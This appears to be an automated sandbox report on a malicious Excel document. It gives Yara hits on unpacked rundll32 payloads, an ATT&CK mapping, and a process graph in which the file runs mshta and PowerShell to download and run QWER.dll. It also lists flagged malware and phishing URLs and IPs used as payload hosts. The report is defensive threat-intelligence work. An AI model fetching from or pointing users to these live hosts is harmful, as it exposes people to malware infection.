                            Source: Yara matchFile source: 10.2.rundll32.exe.b10000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.5a0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.b50000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.b50000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.26a0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.cc0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e80000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e60000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.4e0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.26d0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e00000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a00000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2860000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2c60000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2910000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2fe0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2fe0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.8f0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.840000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.b50000.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.840000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.b00000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2590000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.26a0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.ae0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2910000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.bc0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3a0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2ec0000.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.27e0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d00000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2590000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.310000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.27e0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2890000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.b50000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e90000.16.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.10000000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.470000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2f40000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a00000.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.b10000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000F.00000002.616456228.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512416856.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.683540331.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617069039.00000000008F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564980270.00000000030B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616617596.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564788037.0000000002851000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679113549.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681597853.0000000002C91000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617285505.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564756951.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564304775.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564841038.0000000002910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512269279.0000000002820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617389585.0000000002590000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.680671662.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.680752870.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679483027.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617514155.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679062553.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681792444.0000000002EC1000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.620719407.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681556359.0000000002C60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679555584.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.511939105.0000000000441000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681640222.0000000002D00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.566974916.0000000000B01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681204228.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.620541885.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616727376.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617246098.0000000000BC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.511964806.0000000000470000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.620492867.0000000000270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564618433.0000000000AC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564587056.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617654875.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617205636.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.566592140.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565021247.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512350669.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617317530.0000000002521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679178655.00000000005A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512137672.0000000000AE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564430858.00000000004E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.680211767.00000000025E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.511865871.0000000000310000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.511778687.0000000000170000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564371056.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564944730.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.514931269.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681736430.0000000002E90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679134510.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.567255358.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617576888.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.460063482.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564702502.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512384350.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681713030.0000000002E61000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681364704.0000000002891000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512450327.0000000003021000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564887911.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679503750.0000000000B81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616926650.0000000000840000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564646354.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512203615.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617169491.0000000000A31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512323278.0000000002DD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.514649253.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564333785.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512502215.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617141455.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.514700543.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512166505.0000000000B10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\QWER.dll, type: DROPPED

                            Mitre Att&ck Matrix

                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid Accounts11
                            Scripting                            		1
                            Windows Service                            		1
                            Windows Service                            		1
                            Disable or Modify Tools                            		1
                            Input Capture                            		2
                            System Time Discovery                            		Remote Services1
                            Archive Collected Data                            		Exfiltration Over Other Network Medium13
                            Ingress Tool Transfer                            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                            Default Accounts1
                            Native API                            		Boot or Logon Initialization Scripts11
                            Process Injection                            		11
                            Deobfuscate/Decode Files or Information                            		LSASS Memory3
                            File and Directory Discovery                            		Remote Desktop Protocol1
                            Email Collection                            		Exfiltration Over Bluetooth1
                            Encrypted Channel                            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts13
                            Exploitation for Client Execution                            		Logon Script (Windows)Logon Script (Windows)11
                            Scripting                            		Security Account Manager38
                            System Information Discovery                            		SMB/Windows Admin Shares1
                            Input Capture                            		Automated Exfiltration2
                            Non-Application Layer Protocol                            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts111
                            Command and Scripting Interpreter                            		Logon Script (Mac)Logon Script (Mac)2
                            Obfuscated Files or Information                            		NTDS21
                            Security Software Discovery                            		Distributed Component Object Model1
                            Clipboard Data                            		Scheduled Transfer122
                            Application Layer Protocol                            		SIM Card SwapCarrier Billing Fraud
                            Cloud Accounts1
                            Service Execution                            		Network Logon ScriptNetwork Logon Script2
                            Masquerading                            		LSA Secrets1
                            Virtualization/Sandbox Evasion                            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable Media1
                            PowerShell                            		Rc.commonRc.common1
                            Virtualization/Sandbox Evasion                            		Cached Domain Credentials1
                            Process Discovery                            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                            Process Injection                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                            Hidden Files and Directories                            		Proc Filesystem1
                            Remote System Discovery                            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                            Rundll32                            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562430 Sample: 364453688149503140239183.xls Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 50 129.232.188.93 xneeloZA South Africa 2->50 52 162.214.50.39 UNIFIEDLAYER-AS-1US United States 2->52 54 43 other IPs or domains 2->54 64 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->64 66 Multi AV Scanner detection for domain / URL 2->66 68 Found malware configuration 2->68 70 16 other signatures 2->70 15 EXCEL.EXE 53 12 2->15         started        signatures3 process4 file5 48 C:\Users\...\364453688149503140239183.xls, Composite 15->48 dropped 60 Obfuscated command line found 15->60 19 cmd.exe 15->19         started        signatures6 process7 process8 21 mshta.exe 11 19->21         started        dnsIp9 56 91.240.118.168, 49165, 49166, 80 GLOBALLAYERNL unknown 21->56 24 powershell.exe 12 7 21->24         started        process10 dnsIp11 58 ayoobeducationaltrust.in 139.59.58.214, 49167, 80 DIGITALOCEAN-ASNUS Singapore 24->58 46 C:\ProgramData\QWER.dll, PE32 24->46 dropped 74 Powershell drops PE file 24->74 29 cmd.exe 24->29         started        file12 signatures13 process14 process15 31 rundll32.exe 29->31         started        process16 33 rundll32.exe 1 31->33         started        file17 44 C:\Windows\SysWOW64\...\cojfo.cqz (copy), PE32 33->44 dropped 62 Hides that the sample has been downloaded from the Internet (zone.identifier) 33->62 37 rundll32.exe 33->37         started        signatures18 process19 process20 39 rundll32.exe 1 37->39         started        signatures21 72 Hides that the sample has been downloaded from the Internet (zone.identifier) 39->72 42 rundll32.exe 39->42         started        process22

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            364453688149503140239183.xls19%ReversingLabsDocument-Excel.Trojan.Woreflint

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\ProgramData\QWER.dll100%Joe Sandbox ML

                            Unpacked PE Files

                            SourceDetectionScannerLabelLinkDownload
                            11.2.rundll32.exe.200000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            11.2.rundll32.exe.1d0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2520000.10.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.4b0000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            16.2.rundll32.exe.270000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.3020000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2a0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.2850000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.380000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2e90000.16.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2820000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2860000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.a30000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.1c0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.bd0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.b80000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.a30000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            16.2.rundll32.exe.2a0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2f60000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.24f0000.9.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2c90000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2e40000.12.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.25e0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.440000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.30b0000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.bd0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2dd0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.ac0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2d00000.14.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2e80000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.b20000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.a00000.5.unpack100%AviraHEUR/AGEN.1145233Download File
                            9.2.rundll32.exe.340000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.26a0000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.b50000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.5a0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2e60000.15.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.cc0000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.2fe0000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.26d0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            14.2.rundll32.exe.210000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2e00000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.4e0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.840000.3.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2c60000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.8f0000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.170000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            9.2.rundll32.exe.190000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.b00000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2e70000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.1e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.200000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.ae0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2910000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.350000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.3a0000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.bc0000.8.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2d0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.27e0000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2590000.11.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2ec0000.17.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.310000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.b50000.7.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2890000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.b10000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.470000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2f40000.12.unpack100%AviraHEUR/AGEN.1145233Download File

                            Domains

                            SourceDetectionScannerLabelLink
                            ayoobeducationaltrust.in10%VirustotalBrowse

                            URLs

                            SourceDetectionScannerLabelLink
                            http://91.240.118.168/vvv/ppp/fe.htmlWinSta0100%Avira URL Cloudmalware
                            http://91.240.118.168/vvv/ppp/fe100%Avira URL Cloudmalware
                            http://cmit.valestudios.com/wp-admin/RueGJ41A/13%VirustotalBrowse
                            http://cmit.valestudios.com/wp-admin/RueGJ41A/100%Avira URL Cloudmalware
                            http://sellin.ap0%Avira URL Cloudsafe
                            http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/100%Avira URL Cloudphishing
                            http://91.240.118.168/vvv/ppp/fe.htmlv1.0100%Avira URL Cloudmalware
                            http://test.drea0%Avira URL Cloudsafe
                            http://bawelnianka.cfolks.pl/wp-content/Ttv/100%Avira URL Cloudphishing
                            http://91.240.110%URL Reputationsafe
                            http://ayoobeducationaltrust.in100%Avira URL Cloudphishing
                            https://160.16.102.168:80/gYIhzpB0%Avira URL Cloudsafe
                            http://huculek.f0%Avira URL Cloudsafe
                            https://160.16.102.168:80/gYIhzpA0%Avira URL Cloudsafe
                            http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/100%Avira URL Cloudmalware
                            http://91.240.118.168/vvv/ppp/fe.pngPE3100%Avira URL Cloudmalware
                            http://cmit.valestudios.com/wp-a100%Avira URL Cloudmalware
                            http://thesocialagent.net/b/MO5AKqJ9Ty9lE/PE3100%Avira URL Cloudmalware
                            http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/PE3100%Avira URL Cloudmalware
                            http://91.240.118.168/vvv/ppp/fe.htmlmshta100%Avira URL Cloudmalware
                            http://test.valestudios.com/wp-c100%Avira URL Cloudmalware
                            http://www.protware.com/0%URL Reputationsafe
                            http://crm.compracasaenhouston.com/hs4d8a/c0s13I/PE3100%Avira URL Cloudphishing
                            http://thesocialagent.net/b/MO5AKqJ9Ty9lE/100%Avira URL Cloudmalware
